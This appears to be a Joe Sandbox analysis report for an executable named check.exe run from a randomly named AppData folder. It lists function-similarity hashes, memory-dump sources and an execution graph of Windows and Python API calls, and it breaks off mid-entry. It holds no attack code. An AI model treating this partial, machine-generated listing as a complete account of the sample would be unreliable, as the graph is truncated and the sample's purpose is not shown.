                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                • Instruction ID: bf0f486200464ae469cf92154ba5afffa08dbd6460b299a37645865784f8d1c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7111EC31A0CD5241F6948B6BE5442796251EFA4FB0F844030FB4987B8ADD2DF5D18200
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                • Instruction ID: 4f33c1392833d6e5626f01442d4af5a1aaac4e92df20ef2af5f357a5044e0cb9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22412832A08A8242FB708B25D40137A6799EBA0FB4F544635FE5CC6ADADF3CF4418700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F9046
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8FA948: RtlFreeHeap.NTDLL(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA95E
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8FA948: GetLastError.KERNEL32(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA968
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF61E8ECBA5), ref: 00007FF61E8F9064
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                                • API String ID: 3580290477-813837819
                                                                                                                                                                                                                • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                • Instruction ID: 0582e3c10a815b45c5842cfac3dee306682805832cf1294e75dda5a30411d7e3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5415C32A18F1286EB959F65D8400BD67A4EBA5FF0B594035FD4E83B86DE3CF4918300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                • Instruction ID: 6193eb7917d8b971a3d89606816ea23b55be510a7e9c9a5285e46effb6ad8ed0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D541B132A18E8181DB609F25E4443AA67A4FBA8BA4F944135FE4DC7798EF3CE501C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                • Instruction ID: a143f83be59b1a5db39f7ed4561233b3d926c2653a5fd59c483d878d9ce121c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2521E472A18A8181EB609B15D04427D73B1FBA8F64F958035EA8DC3695DF7CF984CB81
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                • Instruction ID: 8d16528194bfe8c54146845cfe2377a4bd028c82ab9c86ee91b5c01115ad78b4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8112E32618F8182EB628F15E4402597BE5FB98F94F584630EB8D47755DF3CD591C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                                                • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                • Instruction ID: 2c06ec2e1bbbc54900c70a7ad1cce1e8112720ef5c17d0ab8d1cd7df4b243ecd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5101A27291CE0386F761AF64986127E63A4EF68B64FC00836F64DC2682EF3CF5448B14

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:3.8%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:28.1%
                                                                                                                                                                                                                Total number of Nodes:1769
                                                                                                                                                                                                                Total number of Limit Nodes:5
                                                                                                                                                                                                                execution_graph 3390 7ffb9dd62480 3391 7ffb9dd624d4 3390->3391 3392 7ffb9dd624b6 3390->3392 3393 7ffb9dd62531 3391->3393 3394 7ffb9dd624dc __acrt_iob_func 3391->3394 3397 7ffb9dd62556 malloc 3392->3397 3398 7ffb9dd624c7 PyErr_SetFromWindowsErr 3392->3398 3396 7ffb9dd6253b PyErr_SetString 3393->3396 3393->3397 3395 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3394->3395 3399 7ffb9dd62501 __acrt_iob_func 3395->3399 3396->3397 3400 7ffb9dd625a7 3396->3400 3401 7ffb9dd6256e PyErr_NoMemory 3397->3401 3402 7ffb9dd62576 NtQuerySystemInformation 3397->3402 3398->3400 3405 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3399->3405 3401->3400 3403 7ffb9dd62590 3402->3403 3404 7ffb9dd625c6 malloc 3402->3404 3406 7ffb9dd61350 11 API calls 3403->3406 3407 7ffb9dd625de PyErr_NoMemory 3404->3407 3408 7ffb9dd625e6 NtQuerySystemInformation 3404->3408 3409 7ffb9dd62519 __acrt_iob_func 3405->3409 3410 7ffb9dd6259e free 3406->3410 3407->3410 3411 7ffb9dd62602 3408->3411 3412 7ffb9dd6260b malloc 3408->3412 3413 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3409->3413 3410->3400 3416 7ffb9dd61350 11 API calls 3411->3416 3417 7ffb9dd6264d NtQuerySystemInformation 3412->3417 3418 7ffb9dd62645 PyErr_NoMemory 3412->3418 3413->3393 3419 7ffb9dd62677 free free 3416->3419 3417->3411 3421 7ffb9dd6269c free free free Py_BuildValue 3417->3421 3418->3419 3419->3400 3419->3410 3422 7ffb9dd65680 PyArg_ParseTuple 3423 7ffb9dd656ed 3422->3423 3424 7ffb9dd656a8 3422->3424 3425 7ffb9dd656b0 3424->3425 3426 7ffb9dd656be OpenProcess 3424->3426 3437 7ffb9dd61180 3425->3437 3428 7ffb9dd656fa 3426->3428 3429 7ffb9dd656d6 GetLastError 3426->3429 3445 7ffb9dd67a40 3428->3445 3429->3428 3431 7ffb9dd656e1 3429->3431 3430 7ffb9dd656bc 3430->3423 3434 7ffb9dd6570c SetPriorityClass 3430->3434 3433 7ffb9dd61070 11 API calls 3431->3433 3433->3423 3435 7ffb9dd6573b CloseHandle 3434->3435 3436 7ffb9dd6571d PyErr_SetFromWindowsErr CloseHandle 3434->3436 3438 7ffb9dd61010 __stdio_common_vsprintf 3437->3438 3439 7ffb9dd611af PyObject_CallFunction PyErr_SetObject 3438->3439 3440 7ffb9dd611ec 3439->3440 3441 7ffb9dd611fb 3439->3441 3440->3441 3442 7ffb9dd611f2 _Py_Dealloc 3440->3442 3443 7ffb9dd6a0a0 8 API calls 3441->3443 3442->3441 3444 7ffb9dd6120d 3443->3444 3444->3430 3446 7ffb9dd67bac GetExitCodeProcess 3445->3446 3447 7ffb9dd67a5d GetLastError 3445->3447 3448 7ffb9dd67bfb GetLastError 3446->3448 3449 7ffb9dd67bbb 3446->3449 3450 7ffb9dd67a81 GetLastError 3447->3450 3451 7ffb9dd67a68 3447->3451 3456 7ffb9dd67c7e 3448->3456 3457 7ffb9dd67c06 3448->3457 3452 7ffb9dd67c70 3449->3452 3458 7ffb9dd678f0 12 API calls 3449->3458 3454 7ffb9dd67a8f 3450->3454 3455 7ffb9dd67b93 3450->3455 3497 7ffb9dd610e0 3451->3497 3452->3430 3505 7ffb9dd678f0 3454->3505 3464 7ffb9dd61070 11 API calls 3455->3464 3459 7ffb9dd61070 11 API calls 3456->3459 3462 7ffb9dd67c0f __acrt_iob_func 3457->3462 3463 7ffb9dd67c68 SetLastError 3457->3463 3465 7ffb9dd67bd0 3458->3465 3466 7ffb9dd67c8a CloseHandle 3459->3466 3468 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3462->3468 3463->3452 3469 7ffb9dd67b9f 3464->3469 3465->3452 3470 7ffb9dd67bd9 CloseHandle 3465->3470 3466->3430 3473 7ffb9dd67c34 __acrt_iob_func 3468->3473 3469->3430 3476 7ffb9dd610e0 12 API calls 3470->3476 3471 7ffb9dd67a9b 3477 7ffb9dd67afd 3471->3477 3478 7ffb9dd67aa4 __acrt_iob_func 3471->3478 3472 7ffb9dd67b16 3474 7ffb9dd67b1f __acrt_iob_func 3472->3474 3475 7ffb9dd67b7a 3472->3475 3479 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3473->3479 3481 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3474->3481 3483 7ffb9dd610e0 12 API calls 3475->3483 3482 7ffb9dd67bee 3476->3482 3480 7ffb9dd61180 12 API calls 3477->3480 3484 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3478->3484 3485 7ffb9dd67c4e __acrt_iob_func 3479->3485 3486 7ffb9dd67b09 3480->3486 3487 7ffb9dd67b46 __acrt_iob_func 3481->3487 3482->3430 3488 7ffb9dd67b86 3483->3488 3489 7ffb9dd67ac9 __acrt_iob_func 3484->3489 3490 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3485->3490 3486->3430 3491 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3487->3491 3488->3430 3492 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3489->3492 3490->3463 3493 7ffb9dd67b60 __acrt_iob_func 3491->3493 3494 7ffb9dd67ae3 __acrt_iob_func 3492->3494 3495 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3493->3495 3496 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3494->3496 3495->3475 3496->3477 3498 7ffb9dd61010 __stdio_common_vsprintf 3497->3498 3499 7ffb9dd6110f PyObject_CallFunction PyErr_SetObject 3498->3499 3500 7ffb9dd6114c 3499->3500 3501 7ffb9dd6115b 3499->3501 3500->3501 3502 7ffb9dd61152 _Py_Dealloc 3500->3502 3503 7ffb9dd6a0a0 8 API calls 3501->3503 3502->3501 3504 7ffb9dd6116d 3503->3504 3504->3430 3511 7ffb9dd67910 3505->3511 3506 7ffb9dd6791b free 3507 7ffb9dd67924 malloc 3506->3507 3508 7ffb9dd6793b EnumProcesses 3507->3508 3509 7ffb9dd679b5 PyErr_NoMemory 3507->3509 3508->3511 3512 7ffb9dd679a2 free PyErr_SetFromWindowsErr 3508->3512 3510 7ffb9dd679bb 3509->3510 3513 7ffb9dd67a1e 3510->3513 3514 7ffb9dd679c3 __acrt_iob_func 3510->3514 3511->3506 3511->3507 3520 7ffb9dd6795f 3511->3520 3512->3510 3513->3471 3513->3472 3515 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3514->3515 3517 7ffb9dd679ea __acrt_iob_func 3515->3517 3516 7ffb9dd6797f free 3516->3513 3518 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3517->3518 3521 7ffb9dd67a04 __acrt_iob_func 3518->3521 3519 7ffb9dd6798f free 3519->3513 3520->3516 3520->3519 3522 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3521->3522 3522->3513 3523 7ffb9dd62180 3524 7ffb9dd62199 3523->3524 3526 7ffb9dd62190 3523->3526 3525 7ffb9dd621a2 __acrt_iob_func 3524->3525 3524->3526 3527 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3525->3527 3529 7ffb9dd6221b 3526->3529 3530 7ffb9dd62207 Py_BuildValue 3526->3530 3528 7ffb9dd621c9 __acrt_iob_func 3527->3528 3531 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3528->3531 3530->3529 3532 7ffb9dd621e3 __acrt_iob_func 3531->3532 3533 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3532->3533 3533->3526 3534 7ffb9dd63500 PdhOpenQueryW 3535 7ffb9dd63517 3534->3535 3536 7ffb9dd63535 PdhAddEnglishCounterW 3534->3536 3537 7ffb9dd6351e PyErr_Format 3535->3537 3538 7ffb9dd63558 PdhCloseQuery 3536->3538 3539 7ffb9dd63567 PdhCollectQueryData 3536->3539 3538->3537 3540 7ffb9dd635df PdhGetFormattedCounterValue 3539->3540 3541 7ffb9dd63576 3539->3541 3542 7ffb9dd635fb PdhCloseQuery PyErr_Format 3540->3542 3543 7ffb9dd635da PdhRemoveCounter PdhCloseQuery Py_BuildValue 3540->3543 3541->3543 3544 7ffb9dd6357f __acrt_iob_func 3541->3544 3546 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3544->3546 3547 7ffb9dd635a6 __acrt_iob_func 3546->3547 3548 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3547->3548 3549 7ffb9dd635c0 __acrt_iob_func 3548->3549 3550 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3549->3550 3550->3543 3551 7ffb9dd62b00 PyDict_New 3552 7ffb9dd62d0b 3551->3552 3553 7ffb9dd62b2d 3551->3553 3554 7ffb9dd6a0a0 8 API calls 3552->3554 3553->3552 3570 7ffb9dd62d6c __acrt_iob_func 3553->3570 3571 7ffb9dd62cf7 CloseHandle 3553->3571 3575 7ffb9dd62cee _Py_Dealloc 3553->3575 3576 7ffb9dd62de5 __acrt_iob_func 3553->3576 3586 7ffb9dd629d0 3553->3586 3556 7ffb9dd62d4e 3554->3556 3557 7ffb9dd62b8c CreateFileA 3557->3553 3558 7ffb9dd62bc2 DeviceIoControl 3557->3558 3559 7ffb9dd62bff 3558->3559 3560 7ffb9dd62c00 GetLastError 3559->3560 3561 7ffb9dd629d0 swprintf_s __stdio_common_vsprintf_s 3559->3561 3567 7ffb9dd62c1b DeviceIoControl 3559->3567 3568 7ffb9dd62e1e PyErr_SetFromWindowsErr 3559->3568 3560->3559 3563 7ffb9dd62d58 GetLastError 3560->3563 3562 7ffb9dd62c70 Py_BuildValue 3561->3562 3564 7ffb9dd62e3d 3562->3564 3565 7ffb9dd62cc6 PyDict_SetItemString 3562->3565 3563->3553 3566 7ffb9dd62dcd GetLastError 3563->3566 3572 7ffb9dd62e4c 3564->3572 3573 7ffb9dd62e43 _Py_Dealloc 3564->3573 3565->3553 3569 7ffb9dd62e28 3565->3569 3566->3553 3566->3568 3567->3559 3567->3560 3568->3564 3569->3564 3577 7ffb9dd62e34 _Py_Dealloc 3569->3577 3578 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3570->3578 3571->3553 3572->3552 3574 7ffb9dd62e51 CloseHandle 3572->3574 3573->3572 3574->3552 3575->3571 3579 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3576->3579 3577->3564 3580 7ffb9dd62d91 __acrt_iob_func 3578->3580 3582 7ffb9dd62e0a __acrt_iob_func 3579->3582 3581 7ffb9dd62da3 3580->3581 3583 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3581->3583 3582->3581 3584 7ffb9dd62dae __acrt_iob_func 3583->3584 3585 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3584->3585 3585->3553 3589 7ffb9dd61000 3586->3589 3588 7ffb9dd629f5 __stdio_common_vsprintf_s 3588->3557 3589->3588 3590 7ffb9dd64300 PyArg_ParseTuple 3591 7ffb9dd64322 3590->3591 3592 7ffb9dd64329 3590->3592 3593 7ffb9dd64344 OpenProcess 3592->3593 3594 7ffb9dd64333 3592->3594 3596 7ffb9dd6439c PyEval_SaveThread WaitForSingleObject PyEval_RestoreThread 3593->3596 3597 7ffb9dd6435e GetLastError 3593->3597 3595 7ffb9dd61180 12 API calls 3594->3595 3598 7ffb9dd6433f 3595->3598 3601 7ffb9dd643d1 3596->3601 3602 7ffb9dd643dd 3596->3602 3599 7ffb9dd64369 3597->3599 3600 7ffb9dd64384 3597->3600 3604 7ffb9dd61070 11 API calls 3600->3604 3609 7ffb9dd61070 11 API calls 3601->3609 3603 7ffb9dd643e5 PyErr_SetString CloseHandle 3602->3603 3606 7ffb9dd64401 3602->3606 3607 7ffb9dd6448b GetExitCodeProcess 3602->3607 3608 7ffb9dd64390 3604->3608 3606->3603 3611 7ffb9dd6440a __acrt_iob_func 3606->3611 3607->3601 3612 7ffb9dd644c3 CloseHandle PyLong_FromLong 3607->3612 3610 7ffb9dd644a9 CloseHandle 3609->3610 3613 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3611->3613 3614 7ffb9dd6442d __acrt_iob_func 3613->3614 3615 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3614->3615 3616 7ffb9dd64445 __acrt_iob_func 3615->3616 3617 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3616->3617 3617->3603 3618 7ffb9dd69980 GetSystemTimeAsFileTime GetTickCount64 3619 7ffb9dd699d3 Py_BuildValue 3618->3619 3621 7ffb9dd69e80 PdhGetFormattedCounterValue 3622 7ffb9dd69e9b 3621->3622 3653 7ffb9dd65f03 3654 7ffb9dd65f52 Py_BuildValue 3653->3654 3655 7ffb9dd65f77 PyList_Append 3654->3655 3656 7ffb9dd65ff3 3654->3656 3657 7ffb9dd65fde 3655->3657 3673 7ffb9dd65e86 3655->3673 3658 7ffb9dd66002 3656->3658 3659 7ffb9dd65ff9 _Py_Dealloc 3656->3659 3657->3656 3661 7ffb9dd65fea _Py_Dealloc 3657->3661 3662 7ffb9dd66011 3658->3662 3663 7ffb9dd66008 _Py_Dealloc 3658->3663 3659->3658 3660 7ffb9dd65f93 _Py_Dealloc 3660->3673 3661->3656 3666 7ffb9dd6601f 3662->3666 3667 7ffb9dd66016 CloseHandle 3662->3667 3663->3662 3664 7ffb9dd65fa2 _Py_Dealloc 3665 7ffb9dd65fab VirtualQueryEx 3664->3665 3668 7ffb9dd65fd0 CloseHandle 3665->3668 3665->3673 3670 7ffb9dd6a0a0 8 API calls 3666->3670 3667->3666 3668->3666 3669 7ffb9dd65e8f GetMappedFileNameW 3669->3665 3669->3673 3671 7ffb9dd66049 3670->3671 3672 7ffb9dd65eca PyUnicode_FromWideChar 3672->3658 3672->3673 3673->3654 3673->3660 3673->3664 3673->3665 3673->3668 3673->3669 3673->3672 3193 7ffb9dd61e90 PyList_New 3194 7ffb9dd61eae 3193->3194 3195 7ffb9dd61eb7 3193->3195 3196 7ffb9dd61f3e 3195->3196 3202 7ffb9dd61edf 3195->3202 3197 7ffb9dd61fa1 3196->3197 3198 7ffb9dd61f46 __acrt_iob_func 3196->3198 3200 7ffb9dd61fcd malloc 3197->3200 3201 7ffb9dd61fad PyErr_SetString 3197->3201 3224 7ffb9dd61d70 3198->3224 3205 7ffb9dd61ff1 NtQuerySystemInformation 3200->3205 3206 7ffb9dd61fe6 PyErr_NoMemory 3200->3206 3201->3200 3204 7ffb9dd61ef9 3201->3204 3202->3200 3207 7ffb9dd61ef1 PyErr_SetFromWindowsErr 3202->3207 3203 7ffb9dd61f6d __acrt_iob_func 3211 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3203->3211 3208 7ffb9dd61f00 _Py_Dealloc 3204->3208 3209 7ffb9dd61f09 3204->3209 3210 7ffb9dd6200d 3205->3210 3221 7ffb9dd62020 3205->3221 3206->3204 3207->3204 3208->3209 3213 7ffb9dd61f0e free 3209->3213 3214 7ffb9dd61f17 3209->3214 3227 7ffb9dd61350 3210->3227 3216 7ffb9dd61f87 __acrt_iob_func 3211->3216 3213->3214 3215 7ffb9dd62146 free 3220 7ffb9dd62157 3215->3220 3218 7ffb9dd61d70 fprintf __stdio_common_vfprintf 3216->3218 3217 7ffb9dd62040 Py_BuildValue 3217->3204 3219 7ffb9dd62112 PyList_Append 3217->3219 3218->3197 3219->3220 3219->3221 3220->3204 3222 7ffb9dd62167 _Py_Dealloc 3220->3222 3221->3215 3221->3217 3223 7ffb9dd6212e _Py_Dealloc 3221->3223 3222->3204 3223->3221 3234 7ffb9dd61000 3224->3234 3226 7ffb9dd61d96 __stdio_common_vfprintf 3226->3203 3228 7ffb9dd61380 3227->3228 3229 7ffb9dd61385 RtlNtStatusToDosErrorNoTeb 3227->3229 3235 7ffb9dd61010 3228->3235 3229->3228 3231 7ffb9dd613a1 PyErr_SetFromWindowsErrWithFilename 3238 7ffb9dd6a0a0 3231->3238 3234->3226 3247 7ffb9dd61000 3235->3247 3237 7ffb9dd61036 __stdio_common_vsprintf 3237->3231 3239 7ffb9dd6a0a9 3238->3239 3240 7ffb9dd613be 3239->3240 3241 7ffb9dd6a0f4 IsProcessorFeaturePresent 3239->3241 3240->3204 3242 7ffb9dd6a10c 3241->3242 3248 7ffb9dd6a1c8 RtlCaptureContext 3242->3248 3247->3237 3249 